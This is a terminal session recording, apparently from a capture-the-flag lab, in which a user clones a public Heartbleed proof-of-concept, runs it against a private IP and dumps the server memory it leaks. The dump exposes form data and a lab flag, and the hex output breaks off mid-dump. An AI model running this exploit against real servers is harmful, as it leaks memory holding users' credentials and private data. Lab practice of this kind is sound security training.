{"version": 2, "width": 95, "height": 29, "timestamp": 1781015035, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.018604, "o", "\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[1.003085, "o", "g\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[1.096343, "o", "i\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[1.163476, "o", "t"]
[1.291924, "o", " "]
[1.384434, "o", "c"]
[1.465585, "o", "l"]
[1.612817, "o", "o"]
[1.688225, "o", "n"]
[1.791802, "o", "e"]
[2.249433, "o", " "]
[10.347838, "o", "\u001b[7mhttps://github.com/mpgn/heartbleed-PoC.git\u001b[27m"]
[11.313191, "o", "\r\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[C\u001b[Chttps://github.com/mpgn/heartbleed-PoC.git\r\n\u001b[?2004l\r"]
[11.341609, "o", "Cloning into 'heartbleed-PoC'...\r\n"]
[15.121034, "o", "remote: Enumerating objects: 19, done.\u001b[K\r\nremote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19 (from 1)\u001b[K\r\n"]
[15.125994, "o", "Receiving objects:   5% (1/19)\r"]
[15.126349, "o", "Receiving objects:  10% (2/19)\rReceiving objects:  15% (3/19)\rReceiving objects:  21% (4/19)\rReceiving objects:  26% (5/19)\r"]
[15.126483, "o", "Receiving objects:  31% (6/19)\rReceiving objects:  36% (7/19)\rReceiving objects:  42% (8/19)\rReceiving objects:  47% (9/19)\rReceiving objects:  52% (10/19)\r"]
[15.126845, "o", "Receiving objects:  57% (11/19)\rReceiving objects:  63% (12/19)\rReceiving objects:  68% (13/19)\rReceiving objects:  73% (14/19)\rReceiving objects:  78% (15/19)\rReceiving objects:  84% (16/19)\rReceiving objects:  89% (17/19)\rReceiving objects:  94% (18/19)\rReceiving objects: 100% (19/19)\rReceiving objects: 100% (19/19), 5.79 KiB | 5.79 MiB/s, done.\r\n"]
[15.127456, "o", "Resolving deltas:   0% (0/4)\r"]
[15.128401, "o", "Resolving deltas:  25% (1/4)\rResolving deltas:  50% (2/4)\rResolving deltas:  75% (3/4)\rResolving deltas: 100% (4/4)\r"]
[15.13119, "o", "Resolving deltas: 100% (4/4), done.\r\n"]
[15.144513, "o", "\r\n\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[17.272616, "o", "l\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[17.33217, "o", "s\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[17.496048, "o", "\r\n\u001b[?2004l\r"]
[17.49799, "o", "\u001b[0m\u001b[01;34mheartbleed-PoC\u001b[0m\r\n"]
[17.498245, "o", "\r\n\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[18.899095, "o", "c\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[18.959978, "o", "l\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[19.06663, "o", "e"]
[19.234839, "o", "a"]
[19.410836, "o", "r"]
[19.473212, "o", "\r\n\u001b[?2004l\r"]
[19.474511, "o", "\u001b[H\u001b[2J\u001b[3J"]
[19.474697, "o", "\r\n"]
[19.474792, "o", "\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[19.606767, "o", "c\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[19.763259, "o", "d\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[19.882669, "o", " "]
[20.168576, "o", "h"]
[20.243952, "o", "e"]
[20.417022, "o", "a"]
[20.560797, "o", "rt"]
[20.598894, "o", "y"]
[21.03178, "o", "\b\u001b[K"]
[21.631417, "o", "b"]
[21.814946, "o", "l"]
[21.878494, "o", "e"]
[22.028665, "o", "e"]
[22.169606, "o", "d"]
[22.802549, "o", "-"]
[23.049127, "o", "P"]
[23.246072, "o", "o"]
[23.429887, "o", "C"]
[24.071811, "o", "\r\n\u001b[?2004l\r\r\n"]
[24.072005, "o", "\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads/heartbleed-PoC\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads/heartbleed-PoC\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[26.802078, "o", "p\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[27.049557, "o", "y\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[27.134884, "o", "t"]
[27.211207, "o", "h"]
[27.378798, "o", "o"]
[27.443291, "o", "n"]
[28.233192, "o", "2"]
[28.674682, "o", " "]
[31.720238, "o", "h"]
[31.78845, "o", "e"]
[31.944748, "o", "a"]
[32.024615, "o", "r"]
[32.054191, "o", "t"]
[32.285241, "o", "b"]
[32.456268, "o", "l"]
[32.536524, "o", "e"]
[32.68373, "o", "e"]
[32.840122, "o", "d"]
[33.374024, "o", "-"]
[33.553738, "o", "e"]
[33.704534, "o", "x"]
[33.777754, "o", "p"]
[33.897115, "o", "l"]
[34.023043, "o", "o"]
[34.08902, "o", "i"]
[34.188769, "o", "t"]
[34.341839, "o", "."]
[34.530893, "o", "p"]
[34.689464, "o", "y"]
[35.745932, "o", " "]
[36.728521, "o", "1"]
[36.874227, "o", "0"]
[37.074947, "o", "."]
[37.386581, "o", "6"]
[37.529797, "o", "7"]
[37.707545, "o", "."]
[37.94498, "o", "7"]
[38.048663, "o", "5"]
[38.249682, "o", "."]
[38.474922, "o", "6"]
[38.586629, "o", "1"]
[39.75905, "o", "\r\n\u001b[?2004l\r"]
[39.797621, "o", "Connecting...\r\n"]
[39.814583, "o", "Sending Client Hello...\r\n"]
[39.832885, "o", " ... received message: type = 22, ver = 0302, length = 66\r\n ... received message: type = 22, ver = 0302, length = 951\r\n ... received message: type = 22, ver = 0302, length = 331\r\n ... received message: type = 22, ver = 0302, length = 4\r\nHandshake done...\r\nSending heartbeat request with length \u001b[91m4\u001b[0m :\r\n"]
[39.867304, "o", " ... received message: type = 24, ver = 0302, length = \u001b[91m16384\u001b[0m\r\nReceived heartbeat response in file out.txt\r\n"]
[39.88049, "o", "\u001b[91mWARNING \u001b[0m: server returned more data than it should - server is vulnerable!\r\n"]
[39.882681, "o", "\r\n"]
[39.882778, "o", "\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads/heartbleed-PoC\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads/heartbleed-PoC\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[41.910686, "o", "l\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[41.996216, "o", "s\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[42.75206, "o", "\r\n\u001b[?2004l\r"]
[42.753946, "o", "heartbleed-exploit.py  out.txt  README.md  \u001b[0m\u001b[01;34mutils\u001b[0m\r\n"]
[42.754221, "o", "\r\n"]
[42.754376, "o", "\u001b[?2004h\u001b]0;nick@NickRamos: ~/Downloads/heartbleed-PoC\u0007\u001b[;32m┌──(\u001b[1;34mnick㉿NickRamos\u001b[;32m)-[\u001b[0;1m~/Downloads/heartbleed-PoC\u001b[;32m]\r\r\n\u001b[;32m└─\u001b[1;34m$\u001b[0m \r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[45.052325, "o", "c\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[45.247934, "o", "a\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[45.329571, "o", "t"]
[45.490186, "o", " "]
[46.264654, "o", "\b\u001b[K"]
[46.644914, "o", "\b\u001b[K\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[46.670052, "o", "\b\u001b[K\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[46.694805, "o", "\b\u001b[K\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.71928, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.744271, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.77067, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.79568, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.819755, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.84582, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.86958, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.895913, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.919313, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[46.947128, "o", "\u0007\r\u001b[;32m└─\u001b[1;34m$\u001b[0m "]
[47.321947, "o", "c\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C"]
[47.500608, "o", "a\r\u001b[;32m└─\u001b[1;34m$\u001b[0m \u001b[C\u001b[C"]
[47.596114, "o", "t"]
[47.752419, "o", " "]
[47.947293, "o", "o"]
[48.013147, "o", "u"]
[48.105765, "o", "t"]
[48.21712, "o", "."]
[48.488886, "o", "t"]
[48.583864, "o", "x"]
[48.665082, "o", "t"]
[49.416901, "o", "\r\n\u001b[?2004l\r"]
[49.430473, "o", "  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...\r\n  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......\r\n  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....\".\r\n  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.\r\n  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................\r\n  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.\r\n  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...\r\n  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............\r\n  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................\r\n  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.\r\n  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............\r\n  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................\r\n  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................\r\n  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 74 68 3A 20  ....#.......th: \r\n  00e0: 37 35 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65  75..Content-Type\r\n  00f0: 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D  : application/x-\r\n  0100: 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F  www-form-urlenco\r\n  0110: 64 65 64 0D 0A 0D 0A 75 73 65 72 5F 6E 61 6D 65  ded....user_name\r\n  0120: 3D 68 61 63 6B 65 72 31 30 31 26 75 73 65 72 5F  =hacker101&user_\r\n  0130: 65 6D 61 69 6C 3D 68 61 78 6F 72 40 68 61 78 6F  email=haxor@haxo\r\n  0140: 72 2E 63 6F 6D 26 75 73 65 72 5F 6D 65 73 73 61  r.com&user_messa\r\n  0150: 67 65 3D 54 48 4D 7B 73 53 6C 2D 49 73 2D 42 61  ge=THM{sSl-Is-Ba\r\n  0160: 44 7D C9 46 46 3F 84 35 88 74 EF B1 3B 89 A0 13  D}.FF?.5.t..;...\r\n  0170: 92 8F 13 C0 51 C1 04 00 96 00 3F 00 AF 00 11 C1  ....Q.....?.....\r\n  0180: 03 00 10 C0 5C C1 01 00 89 C1 00 00 7E C0 90 C0  ....\\.......~...\r\n  0190: 9C C0 B4 00 BE C0 9B 00 01 C0 B3 00 A1 00 15 C0  ................\r\n  01a0: B2 C0 B1 C0 03 C0 B0 C0 46 C0 AA C0 53 C0 1F C0  ........F...S...\r\n  01b0: A7 C0 5D C0 A5 C0 A4 00 56 C0 A3 C0 27 C0 A2 00  ..].....V...'...\r\n  01c0: 49 00 22 C0 A1 C0 2A C0 9E C0 9D 00 37 00 7D C0  I.\"...*.....7.}.\r\n  01d0: 99 00 24 C0 98 C0 3A D0 02 C0 02 C0 96 00 33 C0  ..$...:.......3.\r\n  01e0: 12 00 21 C0 93 C0 92 C0 91 C0 B5 00 72 00 2F C0  ..!.........r./.\r\n  01f0: 56 C0 8F C0 0A C0 07 C0 80 C0 8D 00 32 00 2B C0  V...........2.+.\r\n  0200: 8C 00 8C 00 6B C0 8B 13 07 C0 88 00 03 00 3A C0  ....k.........:.\r\n  0210: 77 C0 26 C0 87 C0 5F C0 86 00 A5 C0 69 C0 83 C0  w.&..._.....i...\r\n  0220: 81 00 A4 C0 7F C0 15 00 00 00 B5 00 46 00 26 C0  ............F.&.\r\n  0230: 7D C0 7C 00 42 C0 79 C0 78 C0 75 00 05 00 9D C0  }.|.B.y.x.u.....\r\n  0240: 72 00 2E 00 4E C0 71 D0 01 C0 6F C0 6D C0 6C 00  r...N.q...o.m.l.\r\n  0250: 45 00 C4 C0 6B C0 65 00 93 00 85 00 02 00 87 C0  E...k.e.........\r\n  0260: 62 C0 60 C1 02 00 63 00 09 C0 4D 00 50 00 27 C0  b.`...c...M.P.'.\r\n  0270: 59 C0 58 13 02 00 38 00 3E C0 4E 00 B4 00 65 C0  Y.X...8.>.N...e.\r\n  0280: 4C C0 48 C0 47 C0 AE 00 40 C0 1B C0 45 C0 40 00  L.H.G...@...E.@.\r\n  0290: 62 00 35 00 B1 C0 1D C0 3E C0 39 C0 3D 00 39 00  b.5.....>.9.=.9.\r\n  02a0: 04 C0 1C C0 35 C0 32 C0 2E CC AB FE FF C0 2B C0  ....5.2.......+.\r\n  02b0: 9F C0 29 C0 28 00 55 C0 94 C0 23 00 5A C0 22 00  ..).(.U...#.Z.\".\r\n  02c0: 0C C0 21 00 6C C0 A8 C0 3F 00 74 C0 38 C0 13 C0  ..!.l...?.t.8...\r\n  02d0: 17 00 C3 C0 25 C0 16 00 A3 C0 0F C0 0E 00 91 00  ....%...........\r\n  02e0: 8E C0 0D C0 0C 00 3C 00 77 C0 06 00 0E 00 25 00  ......<.w.....%.\r\n  02f0: 90 00 5B 00 AB C0 10 00 C1 00 BC 00 B9 C0 7E 00  ..[...........~.\r\n  0300: B3 00 B0 00 4C 00 AE 00 7C 00 17 00 29 00 81 00  ....L...|...)...\r\n  0310: 53 C0 05 00 82 00 66 00 51 00 AA C0 50 00 A0 00  S.....f.Q...P...\r\n  0320: 8D 00 9C 00 9B 00 97 C0 64 00 8F 00 8B 00 95 00  ........d.......\r\n  0330: 6A CC A9 00 AD 00 A7 00 4A 00 43 00 4D 00 36 00  j.......J.C.M.6.\r\n  0340: 31 00 30 00 1F 00 06 01 00 00 17 00 0F 00 01 01  1.0.............\r\n  0350: 00 0A 00 0E 00 0C 00 17 00 18 00 19 00 1D 01 00  ................\r\n  0360: 11 EC 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0370: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0380: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  03a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  03b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  03c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  03d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  03e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  03f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  04a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  04b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  04c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  04d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  04e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  04f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  05a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  05b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  05c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  05d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  05e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  05f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  06a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  06b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  06c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  06d0: 00 00 00 00 00"]
[49.430908, "o", " 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  06e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  06f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  07a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  07b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  07c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  07d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  07e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  07f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  08a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  08b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  08c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  08d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  08e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  08f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  09a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  09b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  09c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  09d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  09e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  09f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  .........."]
[49.431191, "o", "......\r\n  0a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................\r\n  0cb0: 00 00 00 00 